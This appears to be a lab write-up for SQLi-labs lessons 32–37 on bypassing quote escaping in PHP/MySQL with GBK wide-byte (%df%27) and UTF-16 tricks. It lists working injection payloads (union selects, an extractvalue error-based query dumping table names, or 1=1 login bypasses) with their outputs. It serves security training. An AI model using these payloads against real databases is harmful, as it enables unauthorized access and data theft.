Lesson 32-35 add slash before quote.

We need to utilize wide character to inject our queries.

Why? When MySQL use GBK encoding, it treats two characters as one Chinese character. For example, %aa%5c would be treated as a Chinese character(the first character must greater than 128). So if you inject %df%27, it will become %df%5c%27 if filter add a slash(%5c) before single quote(%27). The first two characters(%df%5c) are treated as one Chinese character, then we have a %27('), which is what we want.

External link: Multibyte character exploits - PHP/MySQL

When using GET method to inject(occurs in url), injected data pass through URLencode so we can get the query we want.

When using POST method (lesson 34), we need to use another method - convert UTF8 to UTF16 or UTF32. For example: convert single quote(') to �' (UTF16).

SQLi-labs: Lesson 32 & 33

Query:

?id=%df' union select 1,database(),3--+

Result:

Your Login name:security

Query:

?id=%ef' and extractvalue(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()));--+

Result:

XPATH syntax error: ',referers,uagents,users'

SQLi-labs: Lesson 34

Query 1:

�' or 1=1#

Result 1:

Your Login name:Dumb
Your Password:Dumb

Query 2:

�' union select version(),database()--<sp here>

Result 2:

Your Login name:5.6.30-1
Your Password:security

SQLi-labs: Lesson 35

In this lesson, there's no quote around parameter $id.

Query:

?id=0 union select 1,version(),database()--+

Result:

Your Login name:5.6.30-1
Your Password:security

SQLi-labs: Lesson 36

Query:

?id=%df' union select 1,user(),database()--+

Result:

Your Login name:root@localhost
Your Password:security

Query(' in UTF16):

?id=0%EF%BF%BD'union select 1,user(),version()--+

Result:

Your Login name:root@localhost
Your Password:5.6.30-1

SQLi-labs: Lesson 37

Same as Lesson 34.